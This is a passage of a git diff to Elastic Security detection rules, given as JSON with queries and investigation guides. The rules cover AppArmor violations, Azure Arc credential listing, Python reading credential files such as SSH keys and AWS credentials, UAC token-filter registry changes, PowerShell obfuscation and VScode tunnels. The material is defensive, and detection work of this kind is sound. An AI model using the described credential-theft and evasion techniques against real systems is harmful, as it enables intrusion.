AppArmor in enforce mode, restoring any modified profiles, patching the vulnerable application or package the attacker abused, removing unnecessary interpreter access and write permissions for the service, and adding detections for the same blocked shell, file, or socket behaviors across similar systems.", + "query": "file where host.os.type == \"linux\" and event.type == \"change\" and event.action == \"violated-apparmor-policy\"\n", + "references": [ + "https://cdn2.qualys.com/advisory/2026/03/10/crack-armor.txt", + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/12/crackarmor-critical-apparmor-flaws-enable-local-privilege-escalation-to-root" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "02137bc2-5cc2-4f7f-a8e4-c52dc239aa69", + "setup": "## Setup\n\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n\nFor this detection rule no additional audit rules are required to be added to the integration.\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Auditd Manager", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "02137bc2-5cc2-4f7f-a8e4-c52dc239aa69_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json b/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json new file mode 100644 index 00000000000..8805bab467a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/022c37cd-5a4f-422b-8227-b136b7a23180_1.json @@ -0,0 +1,134 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time.", + "false_positives": [ + "A service principal used by a CI/CD pipeline may trigger this rule when the pipeline runs from a new IP range for the first time (e.g., migrating to a new runner pool). The 7-day history window will learn the new IPs after the first occurrence.", + "Administrators accessing Arc clusters from a new VPN endpoint or travel location. Validate the caller identity matches an expected user and correlate with known travel or access patterns." + ], + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-azure.activitylogs-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "azure.activitylogs.operation_name", + "azure.activitylogs.identity.claims.appid", + "azure.activitylogs.identity.authorization.evidence.role", + "azure.activitylogs.identity.authorization.evidence.principalType", + "azure.resource.id", + "source.ip", + "source.geo.country_name", + "source.geo.city_name", + "source.as.organization.name" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "Azure Arc Cluster Credential Access by Identity from Unusual Source", + "new_terms_fields": [ + "azure.activitylogs.identity.claims.appid", + "source.ip" + ], + "note": "## Triage and analysis\n\n### Investigating Azure Arc Cluster Credential Access by Identity from Unusual Source\n\nThe `listClusterUserCredential` operation on an Azure Arc-connected cluster returns credentials that allow the caller\nto establish a proxy tunnel via `az connectedk8s proxy`. This proxy routes kubectl commands through the Azure ARM API,\nenabling Kubernetes access without direct network connectivity to the cluster API server.\n\n### Possible investigation steps\n\n- Identify the caller service principal using `azure.activitylogs.identity.claims.appid` and cross-reference with\n Azure AD to determine if this is a known application.\n- Check the source IP and geolocation \u2014 is this from a country or ASN where your organization operates?\n- Correlate with Azure Sign-In Logs around the same time to see the full authentication chain (SP login followed by\n credential listing).\n- Verify the Azure role used \u2014 the `Azure Arc Enabled Kubernetes Cluster User Role` is required for this operation.\n Was this role recently assigned?\n- Check if subsequent Arc-proxied operations (secret/configmap CRUD) occurred after the credential access.\n- Review the service principal creation date in Azure AD \u2014 recently created SPs are more suspicious.\n\n### Response and remediation\n\n- If the source IP is from an unexpected country or the service principal is not recognized, treat as potential\n credential compromise.\n- Revoke the service principal credentials and remove Arc RBAC role assignments.\n- Review Kubernetes audit logs for any operations performed through the Arc proxy after credential access.\n- Rotate any Kubernetes secrets that may have been accessed.\n", + "query": "event.dataset: \"azure.activitylogs\"\n and azure.activitylogs.operation_name: \"MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/LISTCLUSTERUSERCREDENTIAL/ACTION\"\n and event.outcome: (Success or success)\n", + "references": [ + "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect", + "https://learn.microsoft.com/en-us/cli/azure/connectedk8s#az-connectedk8s-proxy", + "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence", + "https://nvd.nist.gov/vuln/detail/cve-2022-37968" + ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "022c37cd-5a4f-422b-8227-b136b7a23180", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Azure", + "Data Source: Azure Arc", + "Data Source: Azure Activity Logs", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.004", + "name": "Cloud Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.007", + "name": "Container API", + "reference": "https://attack.mitre.org/techniques/T1552/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "022c37cd-5a4f-422b-8227-b136b7a23180_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json b/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json new file mode 100644 index 00000000000..8b14e5ec031 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/03b150d9-9280-4eb8-9906-38cfb6184666_1.json @@ -0,0 +1,95 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first time a Python process accesses sensitive credential files on a given host. This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Python Accessed Sensitive Credential Files", + "new_terms_fields": [ + "host.id", + "file.path" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Python Accessed Sensitive Credential Files\n\nAttackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 often target sensitive credential files such as SSH keys, cloud provider credentials, browser session cookies, and macOS keychain data. Since legitimate Python processes do not typically access these files, a first occurrence from a Python process is highly suspicious.\n\nThis rule leverages the Elastic Defend sensitive file `open` event, which is only collected for known sensitive file paths, combined with the New Terms rule type to alert on the first time a specific credential file is accessed by Python on a given host within a 7-day window.\n\n### Possible investigation steps\n\n- Examine the Python process command line and arguments to identify the script or command that triggered the file access.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Review the specific credential file that was accessed and assess the potential impact (SSH keys enable lateral movement, AWS credentials enable cloud access, browser cookies enable session hijacking).\n- Check for outbound network connections from the same process tree that may indicate credential exfiltration.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Look for file creation events in `/tmp/` or other staging directories that may contain copies of the stolen credentials.\n\n### False positive analysis\n\n- Python-based secret management tools (e.g., `aws-cli`, `gcloud`) legitimately access credential files. Consider excluding known trusted executables by process path.\n- SSH automation scripts using `paramiko` or `fabric` may read SSH keys. Evaluate whether the access pattern matches known automation workflows.\n- Security scanning tools running Python may enumerate credential files as part of their assessment.\n\n### Response and remediation\n\n- Immediately rotate any credentials that were potentially accessed (SSH keys, AWS access keys, cloud tokens).\n- Quarantine the Python process and investigate the source script, package, or model file that triggered the access.\n- If a malicious file is confirmed, identify all hosts where it may have been distributed.\n- Review outbound network connections from the host around the time of the credential access to check for exfiltration.\n- Consider implementing `weights_only=True` enforcement for PyTorch model loading across the environment.\n", + "query": "event.category:file and host.os.type:macos and event.action:open and\nprocess.name:python*\n", + "references": [ + "https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/", + "https://github.com/trailofbits/fickling" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "03b150d9-9280-4eb8-9906-38cfb6184666", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "03b150d9-9280-4eb8-9906-38cfb6184666_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json new file mode 100644 index 00000000000..2a5cd9d68ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/07b1ef73-1fde-4a49-a34a-5dd40011b076_318.json @@ -0,0 +1,148 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-m365_defender.event-*", + "logs-crowdstrike.fdr*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Local Account TokenFilter Policy Disabled", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Local Account TokenFilter Policy Disabled\n\nThe LocalAccountTokenFilterPolicy is a Windows registry setting that, when enabled, allows remote connections from local administrators to use full high-integrity tokens. Adversaries may exploit this to bypass User Account Control (UAC) and gain elevated privileges remotely. The detection rule monitors changes to this registry setting, identifying potential unauthorized modifications that could indicate an attempt to facilitate lateral movement or evade defenses.\n\n### Possible investigation steps\n\n- Review the registry event logs to confirm the change to the LocalAccountTokenFilterPolicy setting, specifically looking for entries where the registry.value is \"LocalAccountTokenFilterPolicy\" and registry.data.strings is \"1\" or \"0x00000001\".\n- Identify the user account and process responsible for the registry modification by examining the associated event logs for user and process information.\n- Check for any recent remote connections to the affected system, focusing on connections initiated by local administrator accounts, to determine if the change was exploited for lateral movement.\n- Investigate any other recent registry changes on the host to identify potential patterns of unauthorized modifications that could indicate broader malicious activity.\n- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Elastic Defend, Sysmon, SentinelOne, or Microsoft Defender for Endpoint to gather additional context and assess the scope of the potential threat.\n- Assess the system for signs of compromise or malicious activity, such as unusual processes, network connections, or file modifications, that may have occurred around the time of the registry change.\n\n### False positive analysis\n\n- Administrative tools or scripts that modify the LocalAccountTokenFilterPolicy for legitimate configuration purposes may trigger alerts. To manage this, identify and document these tools, then create exceptions for their known registry changes.\n- System updates or patches that adjust registry settings as part of their installation process can cause false positives. Monitor update schedules and correlate alerts with these activities to determine if they are benign.\n- Security software or management solutions that enforce policy changes across endpoints might modify this registry setting. Verify these actions with your IT or security team and consider excluding these processes from triggering alerts.\n- Custom scripts or automation tasks used for system hardening or configuration management may alter this setting. Review these scripts and whitelist their expected changes to prevent unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement.\n- Revert the registry setting for LocalAccountTokenFilterPolicy to its default state if it was modified without authorization.\n- Conduct a thorough review of recent administrative activities and access logs on the affected system to identify any unauthorized access or changes.\n- Reset passwords for all local administrator accounts on the affected system to prevent potential misuse of compromised credentials.\n- Deploy endpoint detection and response (EDR) tools to monitor for any further suspicious activities or attempts to modify registry settings.\n- Escalate the incident to the security operations center (SOC) for further investigation and to determine if the threat is part of a larger attack campaign.\n- Implement additional network segmentation and access controls to limit administrative access to critical systems and reduce the risk of similar threats.", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.value : \"LocalAccountTokenFilterPolicy\" and\n registry.path : (\n \"HKLM\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"\\\\REGISTRY\\\\MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\",\n \"MACHINE\\\\*\\\\LocalAccountTokenFilterPolicy\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not process.executable : (\n /* Intune */\n \"C:\\\\Windows\\\\system32\\\\deviceenroller.exe\",\n \"C:\\\\Windows\\\\system32\\\\omadmclient.exe\",\n \"C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"C:\\\\Windows\\\\UUS\\\\Packages\\\\Preview\\\\amd64\\\\MoUsoCoreWorker.exe\",\n\n /* Crowdstrike specific exclusion as it uses NT Object paths */\n \"\\\\Device\\\\HarddiskVolume*\\\\system32\\\\deviceenroller.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\system32\\\\omadmclient.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe\",\n \"\\\\Device\\\\HarddiskVolume*\\\\UUS\\\\Packages\\\\Preview\\\\amd64\\\\MoUsoCoreWorker.exe\"\n )\n", + "references": [ + "https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2014-04-02/finding/V-36439", + "https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-506c25a7c167", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "07b1ef73-1fde-4a49-a34a-5dd40011b076", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1550", + "name": "Use Alternate Authentication Material", + "reference": "https://attack.mitre.org/techniques/T1550/", + "subtechnique": [ + { + "id": "T1550.002", + "name": "Pass the Hash", + "reference": "https://attack.mitre.org/techniques/T1550/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 318 + }, + "id": "07b1ef73-1fde-4a49-a34a-5dd40011b076_318", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json b/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json deleted file mode 100644 index 3cb6f4cc706..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/083383af-b9a4-42b7-a463-29c40efe7797_6.json +++ /dev/null @@ -1,173 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies PowerShell scripts that use concatenated strings within dynamic command invocation (&() or .()) as a form of obfuscation. These methods are designed to evade static analysis and bypass security protections such as the Antimalware Scan Interface (AMSI).", - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation", - "note": " ## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation\n\nPowerShell is a powerful scripting language used for task automation and configuration management in Windows environments. Adversaries exploit its capabilities by obfuscating commands to evade detection, often using concatenated strings in dynamic invocations. This detection rule identifies such obfuscation by analyzing script patterns, specifically looking for concatenated strings within dynamic command invocations, which are indicative of attempts to bypass security measures like AMSI. By counting these patterns, the rule effectively flags suspicious scripts, aiding in the identification of potential threats.\n\n### Possible investigation steps\n\n- Review the `powershell.file.script_block_text` field to understand the content and purpose of the script, focusing on the concatenated strings and dynamic command invocations.\n- Check the `host.name` and `user.id` fields to identify the machine and user account associated with the execution of the suspicious script, which can help determine if the activity is expected or anomalous.\n- Analyze the `file.path` field to locate the script's source or storage location, which may provide additional context or indicate if the script is part of a known application or process.\n- Investigate the `powershell.file.script_block_id` and `powershell.sequence` fields to trace the execution sequence and correlate it with other related PowerShell activities, which might reveal a broader pattern of behavior.\n- Assess the `agent.id` field to determine the specific endpoint agent involved, which can assist in further endpoint-specific investigations or actions.\n\n### False positive analysis\n\n- Scripts with legitimate concatenated strings for dynamic command execution may trigger the rule. Review the script context to determine if the concatenation serves a valid administrative purpose.\n- Automated scripts from trusted sources that use concatenation for modularity or readability might be flagged. Consider adding these scripts to an allowlist if they are verified as safe.\n- Development or testing environments where PowerShell scripts are frequently modified and tested could generate false positives. Implement exceptions for known development hosts or user accounts.\n- Security tools or monitoring solutions that use PowerShell for legitimate operations may inadvertently match the pattern. Identify these tools and exclude their operations from the rule.\n- Regularly review and update the exclusion list to ensure it reflects the current environment and does not inadvertently allow malicious activity.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further execution of potentially malicious scripts and limit lateral movement within the network.\n- Terminate any suspicious PowerShell processes identified by the alert to halt the execution of obfuscated commands.\n- Conduct a thorough review of the script block text and associated script block ID to understand the intent and potential impact of the obfuscated commands.\n- Remove any unauthorized or malicious scripts from the affected system and ensure that all legitimate scripts are verified and signed.\n- Restore the affected system from a known good backup if any malicious activity is confirmed, ensuring that all data integrity checks are performed.\n- Escalate the incident to the security operations team for further analysis and to determine if additional systems have been compromised.\n- Update endpoint protection and monitoring tools to enhance detection capabilities for similar obfuscation techniques, leveraging insights from the MITRE ATT&CK framework.\n", - "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\" and powershell.file.script_block_text like \"*+*\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"[.&]\\(\\s*(['\"][A-Za-z0-9.-]+['\"]\\s*\\+\\s*)+['\"][A-Za-z0-9.-]+['\"]\\s*\\)\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _version,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", - "related_integrations": [ - { - "package": "windows", - "version": "^3.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "Esql.script_block_pattern_count", - "type": "integer" - }, - { - "ecs": false, - "name": "Esql.script_block_tmp", - "type": "keyword" - }, - { - "ecs": false, - "name": "_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "_index", - "type": "keyword" - }, - { - "ecs": false, - "name": "_version", - "type": "long" - }, - { - "ecs": true, - "name": "agent.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.path", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_entropy_bits", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_hash", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "powershell.file.script_block_length", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.file.script_block_surprisal_stdev", - "type": "double" - }, - { - "ecs": false, - "name": "powershell.file.script_block_text", - "type": "text" - }, - { - "ecs": false, - "name": "powershell.file.script_block_unique_symbols", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.sequence", - "type": "long" - }, - { - "ecs": false, - "name": "powershell.total", - "type": "long" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "083383af-b9a4-42b7-a463-29c40efe7797", - "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: PowerShell Logs", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1027", - "name": "Obfuscated Files or Information", - "reference": "https://attack.mitre.org/techniques/T1027/" - }, - { - "id": "T1140", - "name": "Deobfuscate/Decode Files or Information", - "reference": "https://attack.mitre.org/techniques/T1140/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0002", - "name": "Execution", - "reference": "https://attack.mitre.org/tactics/TA0002/" - }, - "technique": [ - { - "id": "T1059", - "name": "Command and Scripting Interpreter", - "reference": "https://attack.mitre.org/techniques/T1059/", - "subtechnique": [ - { - "id": "T1059.001", - "name": "PowerShell", - "reference": "https://attack.mitre.org/techniques/T1059/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 6 - }, - "id": "083383af-b9a4-42b7-a463-29c40efe7797_6", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json b/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json new file mode 100644 index 00000000000..62eb3773a1d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0b96dfd8-5b8c-4485-9a1c-69ff7839786a_110.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Attempt to Establish VScode Remote Tunnel", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Attempt to Establish VScode Remote Tunnel\n\nVisual Studio Code (VScode) offers a remote tunnel feature enabling developers to connect to remote environments seamlessly. While beneficial for legitimate remote development, adversaries can exploit this to establish unauthorized access or control over systems. The detection rule identifies suspicious use of VScode's tunnel command, focusing on specific command-line arguments and process behaviors, to flag potential misuse indicative of command and control activities.\n\n### Possible investigation steps\n\n- Review the process details to confirm the presence of the \"tunnel\" argument in the command line, which indicates an attempt to establish a remote tunnel session.\n- Check the parent process name to ensure it is not \"Code.exe\" when the process name is \"code-tunnel.exe\" with the \"status\" argument, as this is an exception in the rule.\n- Investigate the origin of the process by examining the user account and machine from which the process was initiated to determine if it aligns with expected usage patterns.\n- Analyze network logs to identify any unusual or unauthorized connections to GitHub or remote VScode instances that may suggest malicious activity.\n- Correlate the event with other security alerts or logs from data sources like Elastic Endgame, Sysmon, or Microsoft Defender for Endpoint to gather additional context on the activity.\n- Assess the risk and impact by determining if the system or user account has been involved in previous suspicious activities or if there are any indicators of compromise.\n\n### False positive analysis\n\n- Legitimate remote development activities using VScode's tunnel feature may trigger the rule. Users can create exceptions for known developer machines or specific user accounts frequently using this feature for authorized purposes.\n- Automated scripts or deployment tools that utilize VScode's remote tunnel for legitimate operations might be flagged. Consider excluding these processes by identifying their unique command-line arguments or parent processes.\n- Scheduled tasks or system maintenance activities that involve VScode's remote capabilities could be misidentified as threats. Review and whitelist these tasks by their specific execution times or associated service accounts.\n- Development environments that frequently update or test VScode extensions might inadvertently match the rule's criteria. Exclude these environments by setting up exceptions based on their network segments or IP addresses.\n- Training or demonstration sessions using VScode's remote features for educational purposes can be mistaken for suspicious activity. Implement 